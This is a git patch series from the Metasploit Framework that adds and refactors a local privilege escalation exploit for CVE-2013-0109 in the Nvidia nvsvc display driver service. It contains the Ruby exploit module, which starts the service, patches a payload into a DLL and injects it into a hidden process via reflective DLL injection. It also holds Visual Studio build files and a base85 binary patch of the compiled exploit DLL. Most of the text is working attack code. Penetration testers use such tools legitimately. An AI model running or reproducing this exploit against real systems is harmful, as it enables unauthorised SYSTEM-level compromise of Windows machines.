b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.h @@ -0,0 +1,6 @@ +#ifndef _METASPLOIT_SOURCE_NVIDIA_NVSVC_H +#define _METASPLOIT_SOURCE_NVIDIA_NVSVC_H + +VOID elevate_nvidia_nvsvc(LPVOID payload); + +#endif diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj new file mode 100755 index 0000000000..41d2cbd3f2 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj @@ -0,0 +1,142 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + + {6B3FF768-1F25-49C1-8827-EDEC84D4749F} + nvidia_nvsvc + Win32Proj + + + + DynamicLibrary + MultiByte + false + v120 + + + DynamicLibrary + MultiByte + v120 + + + + + + + + + + + <_ProjectFileVersion>10.0.30319.1 + $(Configuration)\$(Platform)\ + $(Configuration)\$(Platform)\ + false + false + AllRules.ruleset + + + $(ProjectName).$(PlatformShortName) + + + + Disabled + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + WIN32;_DEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions) + true + EnableFastChecks + MultiThreadedDebug + + + Level3 + + + Mpr.lib;%(AdditionalDependencies) + %(AdditionalLibraryDirectories) + %(DelayLoadDLLs) + true + Windows + MachineX86 + + + /ignore:4070 + + + editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL + + + _DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions) + + + + + MinSpace + OnlyExplicitInline + false + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + WIN32;NDEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions) + true + MultiThreaded + false + + + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + Size + + + Mpr.lib;%(AdditionalDependencies) + %(AdditionalLibraryDirectories) + false + %(IgnoreSpecificDefaultLibraries) + %(DelayLoadDLLs) + false + true + $(OutDir)\nvidia_nvsvc.map + Windows + + + + + false + + + $(OutDir)\nvidia_nvsvc.lib + MachineX86 + false + + + /ignore:4070 + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-0109\" GOTO COPY + mkdir "..\..\..\..\..\data\exploits\CVE-2013-0109\" +:COPY +copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-0109\" + + + + + + + + + + + + + + \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters new file mode 100755 index 0000000000..1874b42275 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters @@ -0,0 +1,10 @@ + + + + + + + + + + \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/rdi.sln b/external/source/exploits/cve-2013-0109/rdi.sln deleted file mode 100644 index b490cb423d..0000000000 --- a/external/source/exploits/cve-2013-0109/rdi.sln +++ /dev/null @@ -1,32 +0,0 @@ - -Microsoft Visual Studio Solution File, Format Version 11.00 -# Visual C++ Express 2010 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" -EndProject -Global - GlobalSection(SolutionConfigurationPlatforms) = preSolution - Debug|ARM = Debug|ARM - Debug|Win32 = Debug|Win32 - Debug|x64 = Debug|x64 - Release|ARM = Release|ARM - Release|Win32 = Release|Win32 - Release|x64 = Release|x64 - EndGlobalSection - GlobalSection(ProjectConfigurationPlatforms) = postSolution - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Release|ARM - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.Build.0 = Release|ARM - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|ARM - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.Build.0 = Release|ARM - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64 - EndGlobalSection - GlobalSection(SolutionProperties) = preSolution - HideSolutionNode = FALSE - EndGlobalSection -EndGlobal diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index f47e3657c4..e65fb153f2 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -6,6 +6,7 @@ ## require 'msf/core' +require 'msf/core/reflective_dll_injection' require 'rex' require 'msf/core/post/common' require 'msf/core/post/windows/priv' @@ -13,176 +14,180 @@ require 'msf/core/post/windows/process' require 'msf/core/post/windows/services' class Metasploit3 < Msf::Exploit::Local - Rank = AverageRanking + Rank = AverageRanking - include Msf::Post::File - include Msf::Post::Windows::Priv - include Msf::Post::Windows::Process - include Msf::Post::Windows::Services + include Msf::ReflectiveDLLInjection + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Process + include Msf::Post::Windows::Services - def initialize(info={}) - super(update_info(info, { - 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation', - 'Description' => %q{ - The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to - interact with the service. It contains a stacked based buffer overflow as a result - of a memmove operation. + def initialize(info={}) + super(update_info(info, { + 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation', + 'Description' => %q{ + The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to + interact with the service. It contains a stacked based buffer overflow as a result + of a memmove operation. - N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr! + N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr! - This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012. - It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Peter Wintersmith', # Original exploit - 'Ben Campbell ', # Metasploit integration - ], - 'Arch' => ARCH_X86_64, - 'Platform' => 'win', - 'SessionTypes' => [ 'meterpreter' ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Targets' => - [ - [ 'Automatic', { } ] - ], - 'Payload' => - { - 'Space' => 2048, - 'DisableNops' => true - }, - 'References' => - [ - [ 'CVE', '2013-0109' ], - [ 'OSVDB', '88745' ], - [ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ], - ], - 'DisclosureDate' => 'Dec 25 2012', - 'DefaultTarget' => 0 - })) + This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012. + It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Peter Wintersmith', # Original exploit + 'Ben Campbell ', # Metasploit integration + ], + 'Arch' => ARCH_X86_64, + 'Platform' => 'win', + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Targets' => + [ + [ 'Automatic', { } ] + ], + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true, + 'BadChars' => "\x00" + }, + 'References' => + [ + [ 'CVE', '2013-0109' ], + [ 'OSVDB', '88745' ], + [ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ], + ], + 'DisclosureDate' => 'Dec 25 2012', + 'DefaultTarget' => 0 + })) - end + end - def check - vuln_hashes = [ '43f91595049de14c4b61d1e76436164f', - '3947ad5d03e6abcce037801162fdb90d', - '3341d2c91989bc87c3c0baa97c27253b' ] + def check + vuln_hashes = [ + '43f91595049de14c4b61d1e76436164f', + '3947ad5d03e6abcce037801162fdb90d', + '3341d2c91989bc87c3c0baa97c27253b' + ] - os = sysinfo["OS"] - if os =~ /windows/i - svc = service_info 'nvsvc' - if svc and svc['Name'] =~ /NVIDIA/i - vprint_good("Found service '#{svc['Name']}'") + os = sysinfo["OS"] + if os =~ /windows/i + svc = service_info 'nvsvc' + if svc and svc['Name'] =~ /NVIDIA/i + vprint_good("Found service '#{svc['Name']}'") - begin - unless is_running? - print_error("Service is not running!") - else - print_good("Service is running") - end - rescue RuntimeError => e - print_error("Unable to retrieve service status") - end + begin + unless is_running? + print_error("Service is not running!") + else + print_good("Service is running") + end + rescue RuntimeError => e + print_error("Unable to retrieve service status") + end - if sysinfo['Architecture'] =~ /WOW64/i - # Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!) - return Exploit::CheckCode::Detected - else - path = svc['Command'].strip - end + if sysinfo['Architecture'] =~ /WOW64/i + # Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!) + return Exploit::CheckCode::Detected + else + path = svc['Command'].strip + end - begin - hash = client.fs.file.md5(path).unpack('H*').first - rescue Rex::Post::Meterpreter::RequestError => e - print_error("Error checking file hash: #{e}") - return Exploit::CheckCode::Detected - end + begin + hash = client.fs.file.md5(path).unpack('H*').first + rescue Rex::Post::Meterpreter::RequestError => e + print_error("Error checking file hash: #{e}") + return Exploit::CheckCode::Detected + end - if vuln_hashes.include?(hash) - vprint_good("Hash '#{hash}' is listed as vulnerable") - return Exploit::CheckCode::Vulnerable - else - vprint_status("Hash '#{hash}' is not recorded as vulnerable") - return Exploit::CheckCode::Detected - end - else - return Exploit::CheckCode::Safe - end - end - end + if vuln_hashes.include?(hash) + vprint_good("Hash '#{hash}' is listed as vulnerable") + return Exploit::CheckCode::Vulnerable + else + vprint_status("Hash '#{hash}' is not recorded as vulnerable") + return Exploit::CheckCode::Detected + end + else + return Exploit::CheckCode::Safe + end + end + end - def create_proc - windir = expand_path("%windir%") - cmd = "#{windir}\\SysWOW64\\notepad.exe" - return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid - end + def create_proc + windir = expand_path("%windir%") + cmd = "#{windir}\\SysWOW64\\notepad.exe" + return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid + end - def is_running? - begin - status = service_status('nvsvc') - return (status and status[:state] == 4) - rescue RuntimeError => e - print_error("Unable to retrieve service status") - return false - end + def is_running? + begin + status = service_status('nvsvc') + return (status and status[:state] == 4) + rescue RuntimeError => e + print_error("Unable to retrieve service status") + return false + end - end + end - def exploit - unless is_running? - print_error("Service not running - attempting to start") - res = service_start('nvsvc') - case res - when 0 - print_good("Service started") - when 1 - print_status("Service already started") - else - fail_with(Exploit::Failure::Unknown, "Unable to start service") - end - else - print_good("Service is running") - end + def exploit + unless is_running? + print_error("Service not running - attempting to start") + res = service_start('nvsvc') + case res + when 0 + print_good("Service started") + when 1 + print_status("Service already started") + else + fail_with(Exploit::Failure::Unknown, "Unable to start service") + end + else + print_good("Service is running") + end - dll = '' - offset = nil - file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll") - File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) } + dll = '' + offset = nil + file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll") + File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) } - pay = payload.encoded + pay = payload.encoded - bo = dll.index('PAYLOAD:') - raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo - dll[bo, pay.length] = [pay].pack("a*") + bo = dll.index('PAYLOAD:') + raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo + dll[bo, pay.length] = [pay].pack("a*") - pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) + pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) - pe.exports.entries.each do |entry| - if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) - offset = pe.rva_to_file_offset( entry.rva ) - break - end - end + pe.exports.entries.each do |entry| + if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) + offset = pe.rva_to_file_offset( entry.rva ) + break + end + end - print_error("No offset found") unless offset + print_error("No offset found") unless offset - new_pid = create_proc + new_pid = create_proc - if not new_pid - fail_with(Exploit::Failure::Unknown, "Failed to create a new process") - end + if not new_pid + fail_with(Exploit::Failure::Unknown, "Failed to create a new process") + end - vprint_status("Injecting payload into memory") - host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS) - mem = host_process.memory.allocate(dll.length + (dll.length % 1024)) - host_process.memory.protect(mem) - host_process.memory.write(mem, dll) - print_status("Executing exploit...") - host_process.thread.create(mem+offset) - end + vprint_status("Injecting payload into memory") + host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS) + mem = host_process.memory.allocate(dll.length + (dll.length % 1024)) + host_process.memory.protect(mem) + host_process.memory.write(mem, dll) + print_status("Executing exploit...") + host_process.thread.create(mem+offset) + end end From 0c82817445bdd93e10b04d235099f893a7c34f4f Mon Sep 17 00:00:00 2001 From: OJ Date: Sun, 8 Dec 2013 21:15:32 +1000 Subject: [PATCH 043/205] Final changes before PR --- .../CVE-2013-0109/nvidia_nvsvc.x86.dll | Bin 77824 -> 77824 bytes .../nvidia_nvsvc/nvidia_nvsvc.cpp | 2 +- 2 files changed, 1 insertion(+), 1 deletion(-) diff --git a/data/exploits/CVE-2013-0109/nvidia_nvsvc.x86.dll b/data/exploits/CVE-2013-0109/nvidia_nvsvc.x86.dll index 7111a180c17cede62208948bbc268cc4188085c3..c5de3905b5d41f48075aace50f9b5f29a2802e17 100755 GIT binary patch delta 8381 zcmaiZ3w%sR`~Nv7S=q=&R&x;&auGxX=j?s=?Ac9`2trpyB5t8>krySh1c?osU~Qve zkZO5LQ4~ej{ThO#MMaxxkdl(NlSW-yA}+7}J##kI|L6btUG|eX&-Z+1=9!sio_S`@ zq_Ez*u-?10#p_t=w$(2?(_2tSy06!s2nG$I2Qj7oXf+d!j?y~D`z-pCo=2CurZbHa z+X|YZMx>>?tx{~0QKw5Vx1$gzNB~=L|GHyqJ*f zYss<@jfqci?+Gww=fD>Gd0DTE0Yw|zP*ie2QMO0)^@z5jDE<~i*4n$296twzPXGM3 z8Tpn%cnr5>?E%^`w84>xaUHRgv?Q^?Qqn)vf`_6{eZzZfhi>s-2NZ7t=@eE#r6m{3 zkGb7x_8-BHE$LZRMDI%1UEf)>uiN?vX2XIJ8sn#yz#dmeo`8%<*HKzl^I;HaiPm*%R-}oQY5DExvPqau(cgtZ#uvYN3%PNtTKz^!IhW zCtpRo9=318r0Sw5xx4;ZB{8%$_-rF%zw2dxF3pMiYr8vU9my?qRvst0_D1gm&*{XV2ukmRmwA$w{1HnN4j zi>{4aiK;_8(?RG#sFS{e7IuubO$mXCPn6kPXzN0ZBPpu5-0Gt&Z%hJ*z@x)G@3;Xn zni}yh@f76_4zH)=TUSJQ$?=&U6t&et1G*&ET;PK@L6xSf_-t2FGcOYV)=dN*vMC(Z zg`zS*y`Ni>0(BbeDT-on66)Nkd-(Ov(A-X_>$J*?o2>!39Voyo5I7lScIq}n0B-6mxHfD=)l1(@7Z%itXF$ zU%B1j@eLrdQ?e-wzTJX;=yEP5wmW3QFakkYfW1KK&V_|0#R;U-&Y`cAS2D2?orrjs zPC@M=yU>eK@5o-A3ZVO23t3say#j1}(VN zq%>wC(fLRHBppqU^0qDip@-V-0X-KZh< z1#NcS>G_gomdCs5dM%)tdvPee_b&Q8qWh%KyU?&c;hi-~N^asPc@CrtkOCEyJQ7ki zq&;YPACC4%$NHS67oxnrN;(Pc>6biJr8CQVx*l^nZ^l2t)l2gO?Ry$LjTk%-`RdpZWt2D@ zxov@R2TLPpc?RAViQdtL`pg^wv8Jp$nx%_jZbqWDI$h)uuxuLs?N{(Md{o4j#b=iI zycX-auX{x^MG>yw4L^F(6VW--cg(72wB9`5yKgPnsC@$0^~H~FccDqhC>cfPMrYF_ zaDfCi7a!4K6VgUl@DEXFN{ZBI#N=nv3?Ve{#MXzDvZF&kr1q9uZkKvOI|m}lKxt1Q1WbWgNkgo`Px zKz&j_VeXwnmr_sAf1%|g1uZPNG^bUTo`!#U;&x{^hsm5R&1aWdJK%~Nq(`J_`!HFg zy~^Df2H~msY(lO--htMn3EftG0}Hu4l7Eyd!%Ib+z(2D3rQ>Bp6)X{-G^{{R(t6S5 zC^Ef2JpxTmkD=3%BR!*I8q7p?$an{fH&(gbO{3h_(2}8#aED9iWqQxxh;q<;UWR2* zs*(c#qA+Z0`cVr5OV4<63Sa`Wqe=Y=ba7Oit8r8`%}|2Nf3%dQH=~d->**iR-Z3^h z$<=$ToB?y1#)ox^ZG?%0Ep7z);ka{d_vN%~@9aqY0L>lG`ZZnyN~f)!f9>5ZEvBv@soo0{|4hC0}CoilJggHOqLONBTCJj(5AN9?Z&&&@ys6dNpv@} zkcq2ClP9R?2DD+qK-uuCZzgv=x<6s4|7+-d@vU4E0Shronz)fkX+#YZ(&4gb;9VRK6uo{#yNs#Wm42PdkyalbE6iAn#?UVX2`9Gl_ zCJodDLrx_n1EVR+$BZ9WfxUtF$9;X_EyK~K=`Oy1>Hp;)qtwaK^a(V7a!!xZyKtm~ z<(cs_7)03E4nkT+1_W#x&x4$dEMIS`9QXLyC7&XvV}xEEO%O^uzRd42g8QqwO_x{b_32t z&Pp5&MJqsKLT(%TR2kKDKMjA3DyGIo--gyQDzbyJTB2ZQS`8JI%?@jWvp{NhzqZP8 z%-1MjnoasXI2iFWw0>G2ekQzlyc&OX6uMC5#xH=X$d+e?MuV1}@S?os7}o%uvcG-} z>%fOp55=k~h>oq-)JcSXpclkmqv8m0NZ6o1s)CzR9O5^nTjKxmi($v zRhA{_my2$96pP;y3y4cT{RoPmJ}_{lC*uf+R)fAm%cl48KMd0VZWmBwfjt-1&+gE+ zFrY{Q7%#ts?o4lHvYT8#W>4~xJv;lRUq@X@vq~67ID>we-B;EdmQ5uE{iDFu<#R%r zjO!?FPPEMn{5Hc0&MXNPXnC#=>_FhFzy$G<@K)xIhY95+k*&-X4-?KyVp^FK9ww5P z#I`cKJWLEPiEm}fJdBQ)B(yTcHVdJzVk-xJ@!zj8C2ZFq^aHCyJX(9fHf$Xclv---j5@)CI~gFOt(OLVQw zbq}NBCB|0fJo+G~lWiC9?s-zYMU*nUL6qQ=q71?gQHJ6rL~8It@ih|Xh%yFei!v6! zC(3v{T9hn)SClF|Sd`(opD1gg~nZTL{b+;VS|&MF?Nr zU;z<&6F3N<*k>tuA#%dZXz8-U?&lV5*Q%Da01C*;65Bl;ByH7?!z$z zJ`iCnf%ilhPhhPGSpu(!P(|Q55$Xs$B0?h#_Q!ifoIvO;A{;>AdVpf5lgZl(F(ZY* z0ufpW%n@NKfzw1diomfV982JE5l$d5384LaxMyJxAHId0HI)}!5%V6=OwLu*J};2| z1$E1NhrWfZdChbPlII06j$LT!0)6DQ!%+8I_`4(ra3;QskhtP|Kdd7MQsTXOO z&Zp4KMG^E)RI;cqeF2?Xq@wquKNs2IIWK>r-)Pt0oBL*TH($?$xKQVUZnB48{Y|U4 zqG1I+;oOo}Fy3#>8+r@+xnL%IAiT3!Dcg78%|7u2ty-+3*Sjhg@1?u=!^T2RIpW8Z z6h6rD?tO1cK0<2>-;wqIH?gBE+Y6^0b^TE&(4F4<^8erX&h8cWu?J|tQh~|ei|k9| znWcNtfu+5}B0O0sAX+!m)tf*eY^FER^QEg8#~$RccY{l(efCKD6soqzbgI4p;ngwj zm43X`8ayIvGr5LIl38%{8Pu*wBP-cMj#>rM?6&w0vJ~a`zrXv9Zgw}iS`^wg1Q;?C z{dS|rMe5)mzwo?z{Zlac6T}x!X0kV-EyeMSt{Pn}o)w$a{P@ibKSz#r0)5g|x$dVn>Yu<$#20REq2%$OQSxPwjz9|CO36QgbP!U9ZIt{u z$PAFfAazAIHeS+CDTbN_LB;L`jPoUYBES~v;~Xk4{@Ut`=d2-a+9WR-=(nN^Uo}4n zXA&kl)1kxLT|aH=>lO5$B~X2w6i&Hq;ESG`?~4OJM3GyR|I{xy;OMC}e9yml_*nlH+2l)*$@*2c#=w;K0Qe zpb=Y}qW*G-j+yE%RRZccsDEF8$$MzVOL(?@Tf?b%LvR`A~1>tr;l){51N3tKqzi{_3KPj(!#k zgO8`=J;y-n*%aLKdVYHl7;`Np@88?ir}CyiHY1siOs5nqf$*+`MlhT3Yp9e>NlhVHgcFS8%$^XxEJ;^g$*Se5nd&^X zU9He$Yu?u^(CpQm(_GeE*L2X@dTZ0PbF`J(I&HHyL$_S_O4n8&rH|K-(U% z>DwA23_T6~3@L^T!z4pLKE^oN_`cCLl;eC03zC9nzcjPrQm#}Y zi(bo$wPyS_&6ZHO@pHjFmBZ&+Zk8Hx=~ z!$ZRpLlKPp8{>6jC!sr-{B0oxTx@~h6uuBH2-k#qp;2fSx|w>LOr{*uN2WcdBc>|T zx2D^sUrqO60wiWXb0>3*InHb}Cz(^s)6DbDwnFm?^JcTle9U~te9?T>Tw}gzzH9!? z{D=9e`GuKGQZAU4Vx_D<8_0&Sk!*Li536ML?AvS-n*#2d!Dh14*cogNyO6c9#cT~&S#Pc__ZHW|#&zbpad8|AzAbS5 zxgnf|OXJ3Klep>J9Bv+$&lPbF?nADO+sJ(ee!mYq{}gwQs{;T3fxE@s<1qIC=JzE> zD|{906oHCxMU>1RSonW{4(JGey%)%V~|e0^R4jW4f<(QhlU8PM@S7 zsvn`B2p!DVm*_X>H|uvmIJ>NWq4zh8HIx|E7;I&RFAdKOuMKVZdC=n`h;-}tGyG$S zbFcU|MwzjXkvH}?4l<53jy7h(%AaX0H(oG$3%Ma4y}(jpHVB|Kf6Be1+U{ zZWXtl`#1MF_Z4@7E9Wl4EZ^jQ=U#AaVP-#6v{7o5Bb0NL%aoiq4@5B?jIf_3 zS(Bo9SCgih2EI?}q`Lk3euiO&Izt1D&TVjlhu`2W#vEax5N$qaE+?^lGesFe3}e&S z_t-fQii5ae+;vW)PFA1PmFv#ys&toi)w&v8t**|dtJgK?uFWw}5L?MsMRVW2#X%$~e|I!FXLDt{M&v vFJtE^RLY^S%nFo;ly9kqkxo@pR1k<_*jzTV-?1-PiaWx_(bbaGtoMHb=uE^G delta 8436 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 